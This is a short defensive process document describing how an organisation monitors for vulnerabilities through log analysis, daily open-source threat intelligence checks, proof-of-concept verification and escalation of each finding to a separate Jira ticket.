Overview
Vulnerability monitoring process monitor the application behaviors and tracks existing exploits, threats, advance persistent threats related to the existing vulnerabilities found in the proactive process. Continuously monitoring is done by checking on the logs for indicators of attack. This also includes monitoring on open source intelligence sources, also known as “OSINT”, such as cvedetails.com, nvd.nist.gov, exploit-db.com, Google Hacking Database, and talosintelligence.com.
Log monitoring
Logs contains the application and host behaviors. These logs matched with APT strategies and exploit or vulnerability indicators will provide us visibility what is the status of applications, hosts, and whole network.
Threat Intelligence monitoring
Threat Intelligence provides latest information about the threats or vulnerabilities related to the components used by the application or host. These information is used to verify the existing of the threat or vulnerability and strategize the mitigation or remediation to be performed to prevent it.
Monitoring Strategy
The monitoring will be performed using daily monitoring of OSINT and development of alerts to log management platform.
If a detection is raised in log monitoring to a component used by our application, a reactive mitigation technique should be planned to prevent the detection or threat. Or if a new threat intelligence feed is published, the threat should be verified to the application, host and network logs. In case needed, a Proof of Concept (PoC) should be performed to verify the existence of the threat in the network.
Escalation
Detections and threat intel feeds should be raised to vulnerability incident handling process to address the concern. Each unique detection or threat intel feeds should be created a separate Jira ticket.